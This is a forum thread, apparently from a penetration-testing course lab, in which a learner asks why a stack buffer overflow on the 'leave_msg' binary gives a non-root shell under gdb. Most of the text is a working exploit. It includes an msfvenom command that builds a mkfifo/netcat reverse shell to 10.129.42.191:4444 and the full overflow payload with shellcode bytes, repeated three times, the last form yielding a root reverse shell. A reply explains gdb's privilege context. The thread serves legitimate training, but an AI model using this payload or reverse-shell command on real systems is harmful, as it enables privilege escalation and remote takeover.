Stack-Based Buffer Overflows on Linux x86 (Skills Assesment) - Privesc

Hi there.

I’m working on the skills assesment in the Stack-Based Buffer Overflows on Linux x86 module. I have control of the EIP and have my shellcode ready.

The shellcode I created was created with this command.

msfvenom -p linux/x86/exec --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode CMD="/bin/bash -p -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.129.42.191 4444 >/tmp/f'"

I then start gdb like this.

gdb leave_msg and run the application with my payload.

run $(python -c 'print "\x55" * (2060 - 100 - 163 - 4) + "\x90" * 104 + "\xbf\xa8\x81\x8f\xa1\xd9\xee\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x23\x83\xc5\x04\x31\x7d\x0e\x03\xd5\x8f\x6d\x54\x4f\x9b\x29\x0e\xdd\xfd\xa1\x1d\x82\x88\xd5\x36\x6b\xf8\x71\xc7\x1b\xd1\xe3\xae\xb5\xa4\x07\x62\xa1\xd2\xc7\x83\x31\x32\xaa\xea\x5f\x63\x48\x8c\xec\x13\xac\x63\x62\xc4\x81\x18\xa2\x23\xa8\xb3\x82\x04\x38\x21\xb2\x75\xa6\x82\x5f\xe1\x40\x9c\xf9\x9a\xac\x71\x71\x08\xdd\xa2\x1f\xe9\x7e\xdc\xab\x2d\xae\x6a\x3e\x5e\x9f\xf4\xbc\xb1\xbd\x91\x52\xe1\x23\x03\xd9\x95\x83\xee\x74\x46\xf6\xce\xa0\xb7\x8a\x40\xcf\x97\x43\xad\x21\xe9\x91\xf4\x13\x3d\xe4\x28\x5a\x04\x39\x15\xa8\x42\x0d\x61\xf0\x94\x42\xfd\x9d\x98\xb3\x9b\x7a\x59\x9b\x30\x0d\xb8\xee\x37" + "\xd2\xd5\xff\xff"')

I get a reverse shell. But only as: uid=1001(htb-student) gid=1001(htb-student) groups=1001(htb-student)

That is my first question, why isn’t it root ?

The second question I have is, when I run the program from the command line by piping my payload into leave_msg I get a segfault. Even though it is exactly the same payload as above.

python -c 'print "\x55" * (2060 - 100 - 163 - 4) + "\x90" * 104 + "\xbf\xa8\x81\x8f\xa1\xd9\xee\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x23\x83\xc5\x04\x31\x7d\x0e\x03\xd5\x8f\x6d\x54\x4f\x9b\x29\x0e\xdd\xfd\xa1\x1d\x82\x88\xd5\x36\x6b\xf8\x71\xc7\x1b\xd1\xe3\xae\xb5\xa4\x07\x62\xa1\xd2\xc7\x83\x31\x32\xaa\xea\x5f\x63\x48\x8c\xec\x13\xac\x63\x62\xc4\x81\x18\xa2\x23\xa8\xb3\x82\x04\x38\x21\xb2\x75\xa6\x82\x5f\xe1\x40\x9c\xf9\x9a\xac\x71\x71\x08\xdd\xa2\x1f\xe9\x7e\xdc\xab\x2d\xae\x6a\x3e\x5e\x9f\xf4\xbc\xb1\xbd\x91\x52\xe1\x23\x03\xd9\x95\x83\xee\x74\x46\xf6\xce\xa0\xb7\x8a\x40\xcf\x97\x43\xad\x21\xe9\x91\xf4\x13\x3d\xe4\x28\x5a\x04\x39\x15\xa8\x42\x0d\x61\xf0\x94\x42\xfd\x9d\x98\xb3\x9b\x7a\x59\x9b\x30\x0d\xb8\xee\x37" + "\xd2\xd5\xff\xff"' | ./leave_msg

I’m sorry if this is a duplicate and or a very basic stupid question but I feel like I’m missing something.

Thanks

gdb runs the program with the context of the current user, not the owner

Of course it does I see that now. Thanks buddy.

Got root reverse shell now by running it from the terminal like this.

./leave_msg <<< echo $(python -c 'print "\x55" * (2060 - 100 - 163 - 4) + "\x90" * 104 + "\xbf\xa8\x81\x8f\xa1\xd9\xee\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x23\x83\xc5\x04\x31\x7d\x0e\x03\xd5\x8f\x6d\x54\x4f\x9b\x29\x0e\xdd\xfd\xa1\x1d\x82\x88\xd5\x36\x6b\xf8\x71\xc7\x1b\xd1\xe3\xae\xb5\xa4\x07\x62\xa1\xd2\xc7\x83\x31\x32\xaa\xea\x5f\x63\x48\x8c\xec\x13\xac\x63\x62\xc4\x81\x18\xa2\x23\xa8\xb3\x82\x04\x38\x21\xb2\x75\xa6\x82\x5f\xe1\x40\x9c\xf9\x9a\xac\x71\x71\x08\xdd\xa2\x1f\xe9\x7e\xdc\xab\x2d\xae\x6a\x3e\x5e\x9f\xf4\xbc\xb1\xbd\x91\x52\xe1\x23\x03\xd9\x95\x83\xee\x74\x46\xf6\xce\xa0\xb7\x8a\x40\xcf\x97\x43\xad\x21\xe9\x91\xf4\x13\x3d\xe4\x28\x5a\x04\x39\x15\xa8\x42\x0d\x61\xf0\x94\x42\xfd\x9d\x98\xb3\x9b\x7a\x59\x9b\x30\x0d\xb8\xee\x37" + "\xd2\xd5\xff\xff"')